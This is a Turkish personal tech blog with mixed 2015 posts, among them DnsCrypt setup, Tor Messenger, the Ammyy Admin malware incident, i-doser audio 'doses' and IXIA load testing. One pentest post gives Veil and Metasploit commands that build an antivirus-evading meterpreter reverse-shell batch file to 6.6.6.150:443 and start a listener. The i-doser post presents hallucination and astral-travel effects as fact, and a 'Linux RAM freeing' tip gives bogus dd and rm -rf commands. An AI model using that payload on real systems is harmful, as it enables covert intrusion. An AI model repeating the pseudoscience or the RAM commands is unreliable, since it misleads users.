Vedat FETAH Kimdir?

Ege Üniversitesi Bilgi İşlem Daire Başkanlığı bünyesinde kampüs güvenlik sistemleri yöneticisi olarak çalışma hayatıma devam ediyorum. Günlük yaşamda teknoloji ağırlıklı karşılaştığım ve beğendiğim yazıları paylaşmak amacıyla bu bloğu oluşturdum. Umarım birilerinin bilgilenmesini sağlar.

Halen Çalışmakta Olduğum Yer

Halen Ege Üniversitesi Uluslararası Bilgisayar Enstitüsü Binasında Bilgi İşlem Daire Başkanlığın'da çalışmaya devam etmekteyim.

24 Aralık 2015 Perşembe

Cep Telefonunuza Gelen İzinsiz Mesajları Nereye Şikayet Edeceğiz?


Yeni kanun devreye girmesine rağmen hala bilgilerinizi paylaşmadığınız halde rahatsız edici mesajlar alıyorsanız şikayet etmek için bir adresiniz var.  https://tiss.gtb.gov.tr/ adresinden bilgilerinizi girerek oturum açıyor ve gerekli alanları dolduruyorsunuz. Akabinde şikayetin durumu ile ilgili takibi yine site üzerinden yapabiliyorsunuz.

Şikayet etmek istediğiniz mesaj numarasız dahi gelse gönderici başlığını girerek şikayet talebinde bulunabiliyorsunuz. Ayrıca sistem üzerinden Sesli arama şikayeti ve E-Posta şikayeti de yapabiliyorsunuz.

Bol spamsiz günler...

18 Aralık 2015 Cuma

nic.tr Sunucularına Saldırı ve Dns Sorununa Çözüm

Son günlerde Türkiye'nin root dns sunucuları nic.tr'ye yapılan ddos saldırıları sebebiyle neredeyse bütün üniversitelerin internet çıkışları etkilenmiştir. Yapılan saldırının büyüklüğü göz önüne alınınca sorunu çözmek için root dnslere gelen istekler yavaşlatılmıştır. Bu ise ayrı bir soruna neden olmuştur. Bilindiği üzere Dns istekleri udp 53 istekleri olarak yapılır. Udp yapısı gereği bağlantı bilgisini kontrol etmediği için yolda paket zarar görür ya da varması gereken sunucuya ulaşamaz ise internet üzerindeki sunuculara gönderdiğiniz göz atma istekleri başarısız olmaktadır. Bu sorunu çözmenin en kolay yolu DnsCrypt kullanmaktır. DnsCrypt nedir? DnsCrypt istemci ile sunucu arasındaki dns isteklerini vpn tüneli vasıtasıyla encrypt olarak ilettiği için güvenli bir yapıdır. Bu sebeple dns ile ilgili sorgulama yavaşlığını aşmanın en etkili yolu olarak ta kullanılmaktadır. Peki bunu bilgisayarımıza nasıl kurarız? Bunun için farklı işletim sistemleri için yazılımları mevcuttur. Bu yazılımlar https://dnscrypt.org adresinden temin edilebilmektedir. Basitçe linux sunucularınıza kurulum için aşağıdaki yolu izlemeniz yeterli olacaktır. Client sunucu yazılımı ubuntu tabanlı olarak anlatılmaktadır:

1. Dnscrypt yazılımını kuracağınız limnux / mint makinanızda bulunan repository'e aşağıdaki satırları uygulayarak eklemeniz gerekiyor. Ardından güncel paketleri alıp dnscrypt-proxy yazılımını kurmanız gerekiyor.
sudo add-apt-repository ppa:anton+/dnscrypt
sudo apt-get update
sudo apt-get install dnscrypt-proxy
2. Bir sonraki adım makinanızdaki dns ayarını değiştirmek olacaktır. Bunun için ağ ayarlarınızı aşağıda gösterildiği şekilde yapmanız gerekmektedir.
Dns Server alanına 127.0.0.2 ip adresini girmeniz ve ayarlarınızı kaydetmeniz gerekmektedir.

3. Networkü restart etmeniz gerekmekte. Ayrıca açık bulunan browserlarınızı da kapatmanız gerekmektedir. Bunun için service networking restart komutunu işletmeniz yeterli olacaktır.
4. Eğer yukarıdaki adımları izlemenize rağmen internet bağlantınızda dns hatası alıyorsanız bilgisayarınızı yeniden başlatmanız sorunu çözecektir.
5. DnsCrypt'in çalıştığını test etmek için ise aşağıdaki adrese girip test etmeniz yada verilecek tcpdump komutuyla işlemi kontrol etmeniz mümkündür.

Testi yapacağınız url: https://dnsleaktest.com/ Testin başarılı olması durumunda aşağıdaki gibi bir ekran görüntüsü almanız gerekli.



Ya da terminalde aşağıdaki komutu çalıştırmakla test edebilirsiniz.
sudo tcpdump -i NETWORK-INTERFACE dst host 176.56.237.171

Yukarıdaki satırda NETWORK-INTERFACE yazan yere ağ bağdaştırıcınızın adını yazmanız gerekli. Genelde eth0 kablolu wlan0 kablosuz bağdaştırıcı için kullanılır.

Windows işletim sistemi kullananlar için ise https://mega.nz/#!PpEUAKaR!mmHLo12Msfj1MVSWmCwqHEjQAPlVBXhnsucYVgHK2co adresinden client dosyasını indirmeleri gerekmektedir.

1. İndirme işlemi tamamlandıktan sonra rar dosyasını silmeyeceğiniz bir yere açmanız gereklidir.
2. Klasörü açtıktan sonra dnscrypt-winclient.exe dosyasını çalıştırmalısınız.
3. 
Yukarıda açılan ekrandan ağ bağdaştıcınızın solundaki kutuya check atıp Config sekmesine geçmelisiniz.

4. 
Select provider kısmından istediğiniz secure dns sunucuyu seçip Install butonuna tıklamanız yeterli olacaktır.

5. Yukarıdaki aşamadan sonra pencereyi açık tutmanız gerekmemektedir. Kapatıp internetin tadını çıkarabilirsiniz. 

6. Klasörü asla silmeyin. Mutlu gezmeler.



9 Aralık 2015 Çarşamba

TOR’DAN ANONİM MESAJLAŞMA PROGRAMI >> FACEBOOK ŞİFRELEYEN TOR MESSENGER NASIL KULLANILIR?

TOR-TOR_Messenger-Gizlilik

TOR Browser ekibi internette gözetlemeyi engelleyen anonim TOR Messenger programının beta sürümünü duyurdu. Gizliliğinizi koruyan anonim mesajlaşma programı mesajlarınızı şifreliyor ve TOR ağıyla çalışıyor. Açık kaynak kodlu TOR Messenger nasıl kullanılır, hemen görelim.
NSA VPN şifrelerini kırmayı başardı yazımda internette gizliliğinizi korumak için yeni bir yöntem önereceğimi söylemiştim. Şimdi sözümü tutuyor ve sizleri TOR Messenger ile tanıştırıyorum.

BASİT VE KULLANIŞLI

TOR Messenger internette gizliliğinizi korumak için tasarlandı ve herkesin kullanabileceği kadar basit bir program. Bugün Twitter’da sizi kimin unfollow ettiğini (takipten çıktığını) görmek için kullandığınız uygulamalar bile direk mesajlarınızı okumak için izin istiyor.
“Beni kimin takipten çıktığını görmek için DM’lerimi gözetlemene ne gerek var casus uygulama?” diye isyanları oynuyorsanız şifreli anlık mesajlaşma programı TOR Messenger tam size göre. TOR Messenger mevcut arkadaşlarınızı kaybetmemeniz için Facebook üzerinden de şifreli haberleşmeye izin veriyor.

TOR-TOR_Messenger-Gizlilik

Hem şifreliyor hem gizliyor
Gizlilik için şifre yetmez ve şifrenin modası çoktan geçti. Tam gizlilik için mesajlarınızı şifrelemenin yanı sıra TOR browser’ın yaptığı gibi internette kendinizi gizlemeniz gerekiyor.
TOR Messenger da bunu yapıyor. Hem mesajlarınızı hem de TOR ağı sayesinde internet trafiğinizi gizliyor. Bu nedenle Firefox’ta çalışan Cryptocat eklentisinden daha güvenli olduğunu söyleyebiliriz (Tek eksiği: Şimdilik grup sohbet desteklemiyor).
TOR-TOR_Messenger-Gizlilik

KAYIT DIŞI MESAJLAŞMA

TOR Messenger tıpkı TOR Browser’ın yaptığı gibi internette mesajlarınızı korumak için Off-the-Record (OTR) teknolojisini kullanıyor.1
TOR Browser’ın Firefox’u temel alması gibi TOR Messenger da Mozilla anlık mesajlaşma istemcisi Instantbird’ü temal alıyor ve yine popüler bir anlık mesajlaşma programı olan Adium gibi çalışıyor.
TOR-TOR_Messenger-Gizlilik

PC’YE NASIL KURULUR?

TOR Messenger Windows, Mac ve Linux PC sürümlerinde çalışıyor. Kurmak için aşağıdaki adımları uygulayın:
  • TOR’u indirin (siteye ulaşmak için VPN kullanmanız gerekebilir)
  • Uygulamayı Uygulamalar klasörüne sürükleyin.
  • Uygulamayı çalıştırıp başlatın (henüz beta)
  • Tercih ettiğiniz anlık mesajlaşma programını ve hizmetini açın (Facebook vb.)
  • Giriş yapın ve Facebook mesajlarını bile şifreleyerek güvenle yazışın
TOR-TOR_Messenger-Gizlilik

FACEBOOK SOHBETLERİNİ ŞİFRELİYOR

Tor Messenger aşağıdaki sohbet programlarını şifreliyor (Gooıgle Hangouts ve Facebook Messenger bunlara dahil değil, ama Facebook web arayüzünü kullanan entegre Facebook mesajlaşmayı şifreleyebilirsiniz):
  • Jabber (XMPP) sohbet protokolü
  • IRC (Internet Relay Chat)
  • Facebook Chat
  • Google Talk
  • Twitter
  • Yahoo!
  • MAC için Adium ve Windows için Pidgin masaüstü istemcileri
“Niye bu kadar program destekliyor, yoksa bir çapanoğlu mu var?” derseniz, hayır. TOR ekibi TOR güvenliğini kitlelere yaymak için halkın en çok kullandığı mesajlaşma programlarına artık destek oluyor (şimdilik sadece web arayüzü üzerinden).

TOR-TOR_Messenger-Gizlilik

YENİ ÖZELLİKLER GELİYOR

TOR Messenger yakında şu özellikleri destekleyecek
  • Sandboxing (ek güvenlik için kapalı kutu çalışma özelliği)
  • Otomatik güncellemeler (ek güvenlik için kapatın ve elle güncelleyin)
  • Twitter DM’leri için OTR desteği
  • TOR protokolleri için artan destek
  • Güvenli grup sohbeti (np1sec)
  • Şifreli dosya transferi
Uygulamayı buradan indirebilirsiniz.
1https://otr.cypherpunks.ca/
Kaynak:http://khosann.com/

8 Aralık 2015 Salı

Ammy Güncellemesi ile Gelen Cryptolocker Virüsü...

Ammyy’yi müşterilerinize indirtmeyin ve indirmeyin. Bildiğiniz gibi Ammyy Rus programı. Uçak krizinden bu yana Türk IP’lerine Cryptologger gömülü dosya veriyorlar.
Virüs programları ile indirilen dosya tarandığında aşağıdaki sonuç çıkıyor;
Kasım ayından itibaren virüs barındırdığı söyleniyor.
bir ara yukardakini yayınlamışlardı. Ammyy’nin idaasına göre kasımda siteleri hacklenmiş ve sitelerinde crypto locker versiyonlu program eklemeleri yapılmış. Niye temizlemedikleri de ayrı konu crypto locker da rus kaynaklı olunca insan şüphelenmeden edemiyor.
Konu ile ilgili linkler:
The official website of the remote desktop software Ammyy Admin has recently been hacked and has offered several days a contaminated version allowing users by a group of cyber criminals were spied upon. Ammyy Admin makes it possible to record on remote computers.The official website of the remote desktop software Ammyy Admin has recently been hacked and has offered several days a contaminated version allowing users by a group of cyber criminals were spied upon. Ammyy Admin makes it possible to record on remote computers.
According to the developers make more than 50 million people, both business and private use of the software. It is used by companies in the Fortune 500, as well as banks. Also telephone scammers use the software. Some detect anti-virus programs Ammyy Admin whatsoever as unwanted software. According to the Slovak anti-virus company ESET is the remote desktop software especially popular in Russia.
On October 26 ESET discovered that on the website malware was offered. The free version of Ammyy Admin was replaced with an infected version. Until November 2 the infected version was offered. The installer installed the real Ammyy Admin software, as well as a file called AmmyyService.exe or AmmyySvc.exe that contained the malware. Then analyzed the malware existing software and websites visited.

24 Eylül 2015 Perşembe

'Mobil kaza tutunağı' büyük ilgi gördü

Kaza tespit tutanaklarının akıllı telefonlarda mobil ortamda oluşturabilmesini sağlayan uygulama ilgi gördü.

Sigorta Bilgi ve Gözetim Merkezince (SBM) geliştirilen ve kaza tespit tutanaklarının mobil ortamda oluşturulmasını sağlayan uygulama, 1 yılda telefonlara 425 binden fazla indirildi.



AA muhabirinin, SBM yetkililerinden aldığı bilgiye göre, Nisan 2008'den beri kağıt form ile ?düzenlenen kaza tespit tutanaklarının akıllı telefonlardan da doldur??ulabilmesine imkan sağlayan mobil kaza tutanağı, dünyada ilk olma özelliği taşıyor.


Geçen yıl ekim ayında uygulanmaya başlanan ve 1 yılını dolduran sistemle sürücüler, tutanak doldurma işlemini cep telefonları aracılılığıyla çok daha hızlı ve kolayca yapabilme imkanına kavuşuyor.


Başbakanlık Hazine Müsteşarlığı sigortacılık Genel Müdürlüğünün genelgesi doğrultusunda hayata geçirilen uygulama sayesinde ortalama 10 dakikada oluşturulabilen tutanaklar, devlet kurumları ve sigorta şirketleri nezdinde resmiyet ve geçerlilik taşıyor.


- İndirme sayısı 425 bini geçti


İlk yılını dolduran mobil kaza tutanağı uygulaması, akıllı telefonlarda Android işletim sistemlerinden 240 bin, IOS işletim sistemlerinden ise 185 binden fazla kez indirildi.


Uygulama, bugüne dek 7 bin 100'ün üzerinde kazada kullanıldı. 77 ilde en az bir kez tercih edilen uygulamayı Ardahan, Kilis, muş ve Siirt'te kullanan olmadı. Uygulamanın en çok kullanıldığı iller ise İstanbul, Ankara, Antalya, İzmir ve Manisa oldu.


Bu süre içinde en hızlı doldurulan tutanak 5,5 dakikada oluşturuldu, en hızlı sonuçlanan kazanın kusur oranları ise 10 dakikada belirlendi.


Mobil kaza tutanağını tercih edenlerin yüzde 85'ini erkekler oluşturdu. Mobil kaza tutanağı düzenleyen sürücülerin yüzde 35'ini 26-35 yaş aralığındakilerin oluşturduğu dikkati çekti.


Tutanaklarda en çok görülen kaza yüzde 18 ile arkadan çarpma ve yüzde 17 ile park halinde çarpma olarak tespit edildi. Kaza tutanaklarına konu olan araçların yüzde 61'ini Otomobil, yüzde 23'ünü kamyon grubu araçlar oluşturdu.


Uygulama birçok avantaj sunuyor


Akıllı telefonlara yüklenen uygulama ile kağıt kalem ve başka araç gerece ihtiyaç duyulmadan kaza yerinde tespit tutanağının oluşturulmasına imkan veren mobil kaza tutanağı, sigorta poliçesi bilgilerine ulaşma ve tutanağın sigorta şirketine otomatik olarak iletilmesine olanak sağlıyor.


Uygulama ile oluşturulan tutanaklar sonucunda hangi tarafın kusurlu bulunduğu da kazanın kusur durumu belirlendiği anda cep telefonuna SMS ile bilgilendirme yapılarak bildiriliyor.


Mobil kaza tutanağı uygulaması ile kaza noktaları da lokasyon bazlı olarak görüntülenebiliyor. Sürücüler, daha önce oluşturulan kaza tutanakları doğrultusunda hangi noktalarda daha çok kaza meydana geldiğini kaza yoğunluk haritasıyla izleyebiliyor.

27 Haziran 2015 Cumartesi

Ceyd-a Android Türk Asistan

* TRT Türk: Siri'ye Türk Rakip - CEYD-A Android telefonların gözdesi olacak.
* Google Market: CEYD-A tüm ücretli uygulamalar arasında en iyi 2.uygulama, verimlilikte 1 numara (19 Nisan 2015)
CEYD-A (Yardımcı) uygulaması ile günlük hayatınızda ihtiyacınız olan konuları sesli veya yazılı olarak sorabilir ve yine sesli veya yazılı olarak cevap alabilirsiniz. Konuşma ve anlama mekanizması tamamen Türkçe'ye göre ayarlıdır. İsterseniz erkek sesi ile, isterseniz kadın sesi ile cevaplar alabilirsiniz.
Uygulama sürekli geliştirilmekte ve yeni özellikler aşama aşama eklenmektedir.
İnternet sitelerinde gezip yazı, makale veya haberleri sesli olarak otomatik okutabilirsiniz. Okunan cümleler işaretlenir ve yazının takip edilmesi için kolaylık sağlar.
Soldan sağa açılır kayar menü ile her türlü bilgiye hızlıca ulaşabilirsiniz.
Sesli komutlar ilerleyen sürümlerle birlikte arttırılmaktadır.
Tam Sürüm:
*Telefon uykuda iken veya uygulama kapalı olsa bile sesli CEYDA diyerek uygulamayı açma
(Pil az tüketsin diyenler için sadece şarjda iken bu özelliğin aktive edilebilmesi)
*Ceyda saat kaç, yarın hava yağmurlumu ceyda, gibi içinde CEYDA geçen sorularla uygulama kapalı olsa bile cevaplarını öğrenebime
*Gelen çağrının kimden geldiğinin sesli soylenmesi ve sesli veya tuşla çağrıya yanıt verme
*Canlı maç skorları
*Şifalı bitki ve hastalıkları sorgulama
*Tam adres bilgisi öğrenme
*Hava durumu öğrenme (konuma veya sorgulanan adrese göre)
*Haberleri öğrenme
*Trafik yoğunluğu bilgisi öğrenme (konuma veya sorgulanan adrese göre)
*Ansiklopedik bilgi sorgulama (200.000 değişik konu sorgulama)
*Ünlü kişiler ile ilgili bilgi sorgulama
*Gmail hesabından email okuma
*En yakın hastane otopark market kafe cami gibi onemli yerlerin tespiti ve sesli yol tarifi (konuma veya söylenen adrese göre)
*Kur bilgileri, altın, benzin, motorin ve otogaz fiyatları
*Adres defterindeki kişileri sesli olarak arama
*Konuşarak içerik belirleyip SMS gönderme
*Uygulama kapalı olsa bile yeni gelen mesajlari sesli okuyabilme
*Google da arama yapabilme
*Facebook durum güncellemesi
*Konuşarak Foursquare işaretleme ve arkadaşlarının en son bulundukları yerler
*İftar, sahur ve namaz vakitlerini öğrenme (tespit edilen veya sorgulanan şehire göre)
*Surekli dinlemede kalan okuduklarınızı yazan Not defteri
*Başka uygulamalara içerik paylaşımı
*Uygulama çalıştırma.
*Müzik arşivini araştırma ve çalma, sesli önceki ve sonraki direktifleri verebilme
*Hatırlatma ekleme, bilgi saklama, listeleme, silme
*Yer bazlı hatırlatma(Örnek:İşe gittiğimde faturaları kontrol et hatırlat)
*Alarm kurma
*Saat ve tarih sorgulama
*Harita gösterme
*Ayarlara erişim, değiştirme ve bilgilendirme (kablosuz ağ, bluetooth, telefon sesi pil bilgisi gibi)
*Dört işlem
*Döviz, altın, akaryakıt fiyatları sorgulama
*Döviz hesaplama Örnek: 150 dolar kaç lira
*Herhangi bir tarihin hangi güne denk geldiğini söyleme
*Film veri tabanı (imdb puanı, fragmanı, konusu, oyuncu bilgisi, çıkış tarihi)
*Kişi bilgisi (yerli ve yabancı her alandaki ünlüler için kişisel veriler)
*Yüklü olan çevrimdışı seslendirmelerin kullanılabilmesi (TTS)
*Asistana isim verme,kendi isminizi öğretme, adını seslenerek çağırarak uygulamayı çalıştırma
*Komut ekleme, konuşarak öğretme, CEYD yapay zeka dilini kullanarak içeriğini kişileştirme
*Ayarlardan HOME seçeneği aktive edildiğinde cihazın HOME tuşu CEYD-A yı çalıştıracak şekilde ayarlanır. Bu şekilde HOME tuşuna basıldığında uygulama çalışır ve dinleme moduna geçer.
*Dinleme Ayarlarından "Seslenerek Çalıştırma" seçili ise kapalıyken CEYDA veya asistana verdiğiniz isim ile uygulama çalıştırılabilir

Github Atom Editörü

Atom, Github tarafından geliştirilen, açık kaynak kodlu olan kendini “A hackable text editor for the 21st Century” olarak tanımlayan bir editördür. Neye benzediği konusunda ise, Atom’ u Adobe Bracket’a veya Sublime Text’e benzetebiliriz.
Atom’un gömülü özellikleri
Atom birçok özelliğiyle beraber genel olarak bir editörde aradığımız ihtiyaçları karşılayan özellikler sunuyor.
  • Dosya sistemi gösterimi
  • Bulanık mantık tabanlı arama
  • Çoklu seçim özelliği
  • Temalar, çoklu sözdizim desteği
  • Eklentiler
  • Modülerlik
Tabi ki bunlarla yetinmemiz gerekmiyor, Atom ile kendi eklentilerimizi geliştirerek Atom ekosistemine dahil edebiliyoruz. Atom’un Node paket yöneticisinden etkilenen bir de APM (Atom Package Manager) aracı bulunuyor.
Windows için indirip kurabileceğiniz site linki: https://atom.io/download/windows

26 Haziran 2015 Cuma

Sosyal Medya Kullanıcıları “Kendi Wikipedia Sayfanı Oluştur” Tuzağına Düşüyor

Sosyal Medyada “Kendi Wikipedia Sayfasını Oluştur” Tuzağı Can Yakıyor
Son birkaç gündür sosyal medyada moda olan “kendi Wikipedia sayfanı oluştur” uygulamasının bir tuzak olduğu ortaya çıktı.  Facebook’ta son günlerde sıkça paylaşılan komik ve sahte Wikipedia sayfası hazırlama uygulamasının, özel bilgi ve e-posta adreslerini Almanya’da bir şirketin bilgi havuzuna aktardığı ortaya çıkarıldı. Sosyal ağlarda bu tür oyunların tuzağına düşmek, tüm kişisel bilgilerimizi bilinmeyen şirketlere aktarmak anlamına geliyor. Bazı uyanık şirketler türlü şakalarla ve oyunlarla kullanıcıların gözünü boyuyor ve ilginç uygulamaların hızla sosyal mecralarda yayılmasını sağlıyor. Böylece kolayca ve fark ettirmeden kişisel bilgilerimizi ele geçiriyorlar.  "Kendi Wikipedia sayfanı kendin yap" uygulaması da bunlardan bir tanesi. Sahte bir Wikipedia sayfası hazırlamak için kullanılan uygulama, tüm kişisel bilgilerinizin Almanya’da bir şirketin bilgi havuzuna aktarıyor. Aslında “veri madenciliği” olarak da tanımlanabilecek bu uygulama, sadece Türkiye’de değil pek çok ülkede popüler. “Data mining” (veri madenciliği) adı verilen bu yöntem kullanıcı bilgilerinin genellikle belirli meblağlar karşılığında talep eden şirket ya da kurumlara satılması amacını güdüyor. Bazen bu şirketler bu verileri kendi amaçları için de kullanabiliyorlar. Kısaca sosyal medya da her eğlenceli oyunun arkasında mutlaka eğlence olmayabiliyor.  

 Kaynak: Tamindir

2 Haziran 2015 Salı

i-doser ses dalgalarıyla beyni etkileyerek çeşitli hisler hissetmenizi sağlıyor

Bilim insanlarının çok eskilerden beri söylediği bir şeydir, çeşitli ses dalgalarının ve frekanslarının insan beynini etkilediği. Bilim insanlarıses dalgalarını yıllarca araştırdılar. Araştırmalara göre örneğin; Klasik müziğin yaratıcılığı geliştirdiği, hareketli parçaların kan akışını hızlandırdığı bilinmektedir. Yine de bu inanç yıllarca tartışılmış ve insanları ikiye bölmüştür. Her ne olursa olsun bilimsel olarak kanıtlanmış bir gerçek vardır ki o da bazı ses dalgalarının gerçekten beynimizi etkileyebildiğidir. i-doser’da beynimizi etkileyen bu ses dalgalarından yola çıkarak hazırlanmış bir müziktir.

i-doser beyin dalgalarını etkiliyor ve çeşitli hisler hissetmenizi sağlayabiliyor. Çeşitli dozlar halinde hazırlanmış parçalardan oluşan i-doser’in örneğin; Sleeping Angel dozundaki parçasında uyuyamayanlar için uyku getirici bir özelliğe sahip olduğu belirtiliyor. i-doser’deki ses dalgaları “Delta (0-4 Hz), Theta (4-8 Hz), Alpha (8-12 Hz), Beta (13-30 Hz) ve Gamma” olmak üzere 5 farklı çeşittedir ( Hepsinin Hz. leri bilinir fakat Gamma’nın Hz. aralığı 30-X olarak geçer ).
i-doser dinlemenin kişiye fiziksel olarak hiçbir zararı yoktur. Fakat Lucid Dream’ı dinlerseniz ve gerçekleştirebilirseniz, bu size rüyalarınızı kontrol edebilme özelliği verecektir. Rüyada istediğiniz zenginliğe, istediğiniz eve, arabaya, size keyif verecek ne varsa sahip olabileceğiniz için belki bir süre sonra rüyada yaşamak size daha keyifli gelecek ve belki de sürekli uyumak isteyeceksiniz. Bir süre sonra gerçek dünyanın hangisi olduğunu anlamayacaksınız ( İnception filmi örnek gösterilebilir ).
i-doser beyninize değişik sesler göndererek aslında olmayan bir şeyi size yaşatabilir yahut duygularınızı değiştirebilir. 20. yüzyılın başlarında insanları müzikle tedavi etmek mümkündü, şimdi ise keyif için i-doser kullanılabiliyor.
i-doser’i Mp3 player, bilgisayar veya tabletinizde dinleyebiliyorsunuz. Ancak dinlerken mutlaka iyi bir kulaklığa sahip olmalısınız. Daha sonra ister gözlerinizi bir bezle bağlayın isterseniz kendinizi kapatın farketmez fakat gözlerinizi kapatmanız kesinlikle öneriliyor. Rahat bir ortamda tüm konsantrasyonunuzu müziğe vererek doz bitene kadar onu dinlemeniz gerekiyor. Bir doz bittiğinde diğer bir doz’u dinlemek isterseniz de önce reset doz’unu dinlemeli daha sonra diğer doz’a geçmelisiniz. i-doser’in etkisi dozun gücüne göre değişiyor. Doz’lar ilk kullandığınızda etkili olmayabilir. Ama ikinci veya üçüncü kullanışınızda beyin buna alışıyor ve doz’lar daha etkili olmaya başlıyor.
EN ÇOK TERCİH EDİLEN I-DOSER DOZ’LARI
1- Gate Of Hades : Korku, ölüm hissi verir, bazı kaynaklarda “Şeytanın evine girmiş gibi hissedersiniz” diye geçer.
2- Lucid Dream : Rüyalarınızı kontrol etmenizi sağlayan müthiş doz.
3- Quick Happy : Mutlu edici doz.
4- Adrenochrome : Çok güçlü hayal görmenizi sağlar, enerji verir.
5- Trip : Göz açıkken bile hayal görebilirsiniz.
6- Hand of God : Çeşitli farklı etkileri vardır, en sevilen dozdur.
7- Astral : Astral seyahate çıkmanız kolaylaşır.
8- Unofficial Psilocybin : Halisünasyon görmenizi ve duygularınızı daha derin yaşamanızı sağlar.
i-doser’in etkisi doz’un gücüne göre değişiyor. Doz’ların güçleri; Moderate (Orta), Strong (Güçlü), Very Strong (Çok Güçlü), Very Very Strong (Çok çok Güçlü) olarak gruplara ayrılıyor.

31 Mayıs 2015 Pazar

Linux Sunucularda Ram Boşaltma

Aşağıdaki komutları yürüterek linux sunucunuzun hafızasını bir nebze de olsa boşaltabilirsiniz.

> dd if=/dev/zero of=/dev/rambosalt
> rm -rf /dev/rambosalt

Sızma Testlerinde Veil ile Antivirüs Uygulamaların Atlatılması

Penetrasyon testlerinde sıklıkla antivirus uygulamalarının atlatılması mecburiyeti doğmaktadır. Çeşitli encoding yöntemleri kullanılarak antivirus yazılımları atlatılabilmektedir. Smbexec, metload benzeri yazılımlar ile istenilen özelliklerde zararlı yazılım üretmek mümkündür. Aşağıda bunlara alternatif ve oldukça başarılı bir uygulama olan VEIL ile bu işlemin nasıl gerçekleştirilebileceğine değinilmiştir.


Windows işletim sistemleri üzerinde çalışan antiviruslere yakalanmayan batch file oluşturmak için aşağıda ki ilgili komutları çalıştırmamız yeterlidir. 6.6.6.150 ipsine 443 portu üzerinden reverse bağlantı kurarak erişim sağlanacaktır.


Öncelikle aşağıdaki komut kullanılarak batch file oluşturulabilir. İlgili komut çalıştırıldıktan sonra .bat uzantılı zararlı uygulamamız oluşmuş olacaktır.


veil -l powershell -p VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=6.6.6.150 LPORT=443









Windows üzerinde batch filemizi çalıştırmadan önce lokal makinamızda 443 portu metasploit ile dinleme moduna alıyoruz.


Aşağıda 443 portunun dinleme moduna alınması sağlanmıştır. Payload olarak reverse_tcp kullanılmıştır.



msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=6.6.6.150 LPORT=443 E







Windows üzerinde undetectable.bat dosyamızı çalıştırıyoruz. Çalıştırmamızla birlikle meterpreter shell bizi karşılıyor.






Zararlının çalıştırıldığı system üzerindeki antivirüsün zararlıyla ilgili herhangi bir bloklama işlemi gerçekleştirmediği aşağıda görülebilmektedir.



Kaynak: networkpentest.net

IXIA ile Yük ve Stres Testi

IXIA ile yük ve stres testi yapılabileceği gibi penetrasyon testler esnasında hedef sistemlerin Denial of Services saldırılarına karşı yeterince önlem alınıp alınmadığının testlerinde de kullanılmaktadır. Sisteminizde bulunan cihazların karşılayabileceği yükü öğrenmenin birçok yolu var. IXIA Server ile bu işlemi yapmak bu seçeneklerden bir tanesidir. IXIA, trafik generate eden yüksek persormanslı bir server'dır. Http post/get flood saldırıları başta olmak üzere hemen hemen tüm flood saldırı yöntemlerini desteklemektedir.  Detaylar için http://www.ixiacom.com/ linkine tıklayabilirsiniz. 
   Aşağıda yapmış olduğum yük testlerinden birinin topolojisi bulunmaktadır. Http get isteğiyle LB ve Server'lar için yük testi yapılmıştır.


Topoloji'den Sonra biraz LB üzerindeki konfigürasyonlardan bahsedip, IXIA'ya geçeceğiz. 

    Topolojide F5 LB üzerinde vCMP ile ayrılmış Guestler bulunmaktadır. Bu guestler şasiler arasında yedekli çalışmaktadır. HTTP Guest içerisinde oluşturulmuş Test_VS altında aşağıdaki şekilde ve topolojide görüldüğü gibi 3 adet sunucu bulunmaktadır.


 Bu sunucular üzerinde IIS'ler aktif edilmiş ve bu server'lara 172.30.10.101/test.htm şeklinde istekte bulunulduğunda cevap olarak OK1 dönmektedir. Bu üç sunucu VS arkasına alındıktan sonra IXIA tarafında gerekli çalışmalar başlatılır.

  • IXIA sunucusunun managemet portu ayarlanır
  • Sunucu portları (basılacak trafik bouyuna göre port sayısı arttırılmalıdır) switch'e bağlanır ve switch üzerinde gerekli vlan ayarları yapılır. Örnekte VS IP'si 172.30.20.55 ve VLAN ID'si 20 olduğu için portlar VLAN 20'ye atanmıştır.
  • IXIA Client'ı olan IxLoad, Windows 7'de sorun çıkarabilen bir uygulamadır. Bu nedenle başka bir Win2003 sunucusu üzerinde SQL2005 ile birlikte kurulur. (Önce IxLoad kurulur)
  • Kurulumdan sonra karşınıza aşağıdaki gibi bir ekran çıkacaktır. 

  • New Traffic Flow sekmesinde aşağıdaki gibi bir NetTraffic üretilir.

                    
  • Oluştulan NetTraffic altında, IXIA Sunucusu Client rolünde olacağı için HTTP Client seçilir.

  • Oluşan HTTPClient1 altında Start üzerinde sağ tık>Add Commands yapılır ve isteğimiz get olacağı için get seçilir. Bu adımdan sonra yapacağımız istek bu kısma girilecektir.
  • Test yapılacak IP ve istek sayfası aşağıdaki gibi yazılır.
  • Yukarıdaki şekilde 172.30.20.55 IP'si LB üzerinde oluşturduğumuz Virtaul Server IP'sidir. test.htm ise serverların bu IP'ye yapılan requestlere döndüğü cevaptır. Server'lar üzerindeki IIS'lerde test.htm şeklinde bir dosya bulunmaktadır.
  • Yapılacak istek settings sekmesinden HTTP 1.1 ve maximum secilir.
                                 
  • Şimdi gelelim daha önceden Switch portlarına taktığımız IXIA sunucusunun portlarına.(Yapılan testte 4 adet fiziksel port bağlanmıştır) Bu portların VS'e yapacağı requestler için aynı bloktan veya GW li IP vermek gerekecektir. Bu işlem, aşağıdaki menüden yapılır.

  • Traffic@Network1>Network tıklanarak şeklin altındaki menü aktif edilir. Bu menüde istek yapılacak başlangıç IP'si (3), bu IP'lerin artış şekli(4) ve kaç client yani IP bulunacağı(5) belirlenir.
  • Şimdi sıra IXIA sunucusu üzerindeki porları aktif etmeye. Aşağıdaki şekildeki gibi port

assestment kısmında 2 nolu kutu tıklanır. Burada karşımıza Chasis Name sorulacaktır. Buraya şasi IXIA Sunucu şasi management IP girilir. Bu işlemden sonra 3 nolu bölümde olduğu gibi karşımıza sunucunun portları çıkacaktır. Burada yeşil portlar aktif olan portlardır. Bu portlara çift tıklanarak sağdaki Assigned Ports kısmına atanır.

  • Biraz sabır. Teste başlamamıza çok az kaldı. Bu işlemler tamamlandıktan sonra connectin per sec, kaç sn test yapılacağı gibi adımlar kaldı. Hadi birde bunlara göz atalım.    
  • Timeline and Objective menüsünden istenilen connection per sec sayısı ve süreleri girilir. Örnekte 10.000 Connection 30 sn süre ile sunuculardan 1 iteresyon ile istek gönderecektir. Play butonu ile test başlayacaktır. 
  • Aşağıda daha önceden yapılmış bir testin sonuçları paylaşılmıştır.
    Bu sonuca göre test boyunca 1.76M request gönderilmiştir ve bu requestlerin 115 tanesi başarısız olarak dönmüştür. 

